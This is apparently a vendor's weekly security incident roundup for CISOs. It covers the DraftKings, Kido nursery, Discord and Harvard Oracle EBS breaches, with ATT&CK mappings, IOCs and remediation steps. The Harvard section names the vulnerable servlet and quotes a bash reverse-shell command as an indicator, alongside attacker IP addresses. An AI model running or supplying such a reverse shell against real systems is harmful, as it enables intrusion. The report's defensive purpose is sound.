Home
This week witnessed four significant cybersecurity incidents affecting major organizations across multiple sectors. The period from October 7-13, 2025, was marked by sophisticated attack campaigns targeting authentication systems, zero-day vulnerabilities, and supply chain compromises.
Key Incidents:
- DraftKings Credential Stuffing Attack (September 2, 2025): Targeted under 30 customer accounts through automated credential reuse
- Kido International Nursery Ransomware (September 25, 2025): Compromised sensitive data of over 8,000 children and families
- Discord Third-Party Data Breach (September 20, 2025): Exposed government IDs and support data for 70,000 users
- Harvard University Oracle Zero-Day Exploit (August 9, 2025): Leveraged CVE-2025-61882 for data exfiltration
All incidents demonstrate evolving threat landscapes targeting authentication weaknesses, supply chain vulnerabilities, and zero-day exploits in enterprise systems.
>>Outpace Attackers With AI-Based Automated Penetration Testing
Incident Analysis
1. DraftKings Credential Stuffing Account Breach
Date of Incident: September 2, 2025
Overview
DraftKings, the Boston-based sports betting platform, experienced a credential stuffing attack affecting fewer than 30 customer accounts. Attackers utilized automated tools to test stolen username-password combinations from external data breaches against DraftKings authentication systems.
Technical Explanation
The attack leveraged MITRE ATT&CK technique T1110 (Brute Force) under the Initial Access tactic. Threat actors deployed automated scripts conducting rapid sequential login attempts across multiple accounts using credential pairs likely obtained from underground forums or previous data breaches. The attack pattern showed:
- High-volume login attempts from suspicious IP addresses
- Anomalous user agent strings in authentication logs
- Sequential failed authentication events (Windows Event ID 4625) followed by successful logins (Event ID 4624)
- No evidence of malware deployment or lateral movement within DraftKings infrastructure
Impact
Compromised customer data included names, addresses, dates of birth, phone numbers, email addresses, last four digits of payment cards, profile photos, transaction history, account balances, and password modification timestamps. No government-issued identification numbers or complete financial account details were accessed.
Technical Details
IOCs and Artifacts:
- Suspicious IP ranges conducting multiple authentication attempts
- Elevated failed login event volumes preceding successful access
- Account lockout patterns followed by credential validation
- No evidence of malicious file execution or registry modifications
Remediation Actions:
- Mandatory password resets for affected accounts
- Multi-factor authentication enforcement for DK Horse accounts
- Enhanced fraud detection algorithms implementation
- Additional technical measures to prevent similar credential-based attacks
Takeaway for CISO
This incident underscores persistent credential reuse risks in online gambling platforms. Organizations must implement robust authentication controls including adaptive MFA, behavioral analytics, and proactive credential monitoring to mitigate automated attack campaigns.
2. Kido International Nursery Ransomware Attack
Date of Incident: September 25, 2025
Overview
Kido International, operating 18 nurseries across Greater London, suffered a ransomware attack by the “Radiant” group, compromising sensitive data of over 8,000 children and their families. The attack involved data exfiltration followed by extortion attempts targeting parents directly.
Technical Explanation
The breach employed MITRE ATT&CK technique T1190 (Exploitation of Public-Facing Application) for initial access, followed by T1486 (Data Encrypted for Impact). Attackers allegedly purchased access from an initial access broker who had previously compromised a Kido staff computer. The ransomware variant encrypted local and network-mapped drives while deploying systematic data exfiltration capabilities.
Impact
Stolen data included names, photographs, home addresses, birthdates, and safeguarding notes for over 8,000 children, plus information on parents, relatives, employees, and company operations. The attackers published sample data on dark web sites and conducted threatening phone calls to parents as part of extortion tactics.
Technical Details
Attack Chain:
- Initial access via compromised staff endpoint
- Lateral movement through network infrastructure
- Data discovery and systematic exfiltration
- Ransomware deployment with file encryption
- Extortion campaign with staged data releases
IOCs:
- Ransomware file hash: e3b0c44298fc1c149afbf4c8996fb9 (truncated in source)
- Evidence of shadow copy deletion
- Encrypted file extensions consistent with Radiant ransomware family
- Network traffic to known command-and-control infrastructure
Law Enforcement Response:
Metropolitan Police arrested two suspects (ages 17 and 22) in Bishop’s Stortford on charges of computer misuse and blackmail.
Takeaway for CISO
This attack highlights extreme risks when ransomware groups target organizations handling child data. CISOs must prioritize comprehensive endpoint protection, network segmentation, and rapid incident response capabilities while ensuring robust data protection measures for sensitive demographic information.
3. Discord Data Breach via Third-Party Vendor
Date of Incident: September 20, 2025
Overview
Discord experienced a supply chain compromise affecting approximately 70,000 users when attackers breached a third-party customer support provider, identified as Zendesk. The 58-hour unauthorized access period resulted in government ID theft and support ticket data exfiltration.
Technical Explanation
The attack employed MITRE ATT&CK techniques T1195 (Supply Chain Compromise) and T1078 (Valid Accounts). Attackers compromised a support agent’s credentials from an outsourced Business Process Outsourcing (BPO) provider, gaining access to Discord’s Zendesk instance and internal support tools including Kolide device trust solutions and Okta identity management systems.
Impact
Exposed data encompassed 5.5 million unique users across 8.4 million support tickets, including government-issued ID photos (approximately 70,000 users), names, Discord usernames, email addresses, partial payment information, IP addresses, and complete support message transcripts. Attackers claimed to have exfiltrated 1.6 terabytes total, including 1.5 TB of ticket attachments and over 100 GB of transcripts.
Technical Details
Attack Infrastructure:
- Compromised BPO provider credentials
- Access to Zenbar internal support application
- API integration exploitation for database queries
- Multi-factor authentication bypass capabilities
Threat Actor Profile:
Group “Scattered Lapsus$ Hunters” demanded $5 million ransom (reduced to $3.5 million) and threatened public data release following failed negotiations.
Remediation Actions:
- Immediate vendor access revocation
- Computer forensics firm engagement
- Law enforcement notification
- Enhanced third-party security auditing
Takeaway for CISO
This supply chain attack emphasizes critical risks in outsourced customer support operations. Organizations must implement stringent vendor security assessments, continuous monitoring of third-party access, and robust API security controls to prevent similar compromise scenarios.
4. Harvard University Data Breach via Oracle E-Business Suite Zero-Day
Date of Incident: August 9, 2025 (exploitation began), October 12, 2025 (disclosed)
Overview
Harvard University became the first confirmed victim of a mass exploitation campaign targeting Oracle E-Business Suite systems through CVE-2025-61882, a critical zero-day vulnerability with CVSS score 9.8. The attack, attributed to threat actors associated with the Cl0p ransomware group, affected “a limited number of parties associated with a small administrative unit”.
Technical Explanation
The exploitation leveraged a complex attack chain combining Server-Side Request Forgery (SSRF), Carriage-Return Line-Feed (CRLF) injection, authentication bypass, and XSL template injection to achieve remote code execution on Oracle EBS servers. The attack targeted the /OA_HTML/configurator/UiServlet component, allowing unauthenticated remote code execution.
Impact
While specific data exposure details remain undisclosed, the compromise affected Oracle E-Business Suite systems containing finance, human resources, and supply chain management functions. The broader campaign impacted dozens to potentially over 100 organizations globally, with Cl0p conducting mass extortion attempts via compromised email accounts.
Technical Details
Vulnerability Details:
- CVE: CVE-2025-61882
- CVSS Score: 9.8 (Critical)
- Affected Component: Oracle Concurrent Processing (BI Publisher Integration)
- Attack Vector: Network, no authentication required
Exploitation Timeline:
- July 10, 2025: Early suspicious activity observed
- August 9, 2025: Confirmed zero-day exploitation begins
- October 2, 2025: Oracle acknowledges vulnerability
- October 4, 2025: Emergency patch released
- September 29, 2025: Mass extortion campaign launches
IOCs and Artifacts:
- Suspicious HTTP requests to /OA_HTML/configurator/UiServlet
- External XSL payload retrieval patterns
- Command execution via bash reverse shells (bash -i >& /dev/tcp/<ip>/<port> 0>&1)
- Python AIOHTTP callback server infrastructure
Attack Infrastructure:
- IP addresses: 200.107.207.26, 161.97.99.49
- Leaked exploit components: exp.py, server.py, readme.md
- Proof-of-concept disclosure via “SCATTERED LAPSUS$ HUNTERS” Telegram channel
Takeaway for CISO
This zero-day exploitation campaign demonstrates the critical importance of emergency patch management for enterprise applications. Organizations must maintain current Oracle Critical Patch Updates, implement robust vulnerability management processes, and establish rapid response capabilities for zero-day threats targeting core business systems.
Outpace Attackers With AI-Based Automate Penetration Testing With FireCompass:
FireCompass is a single platform for AI-Powered Continuous Automated Red Teaming (CART), Pen Testing & NextGen Attack Surface Management
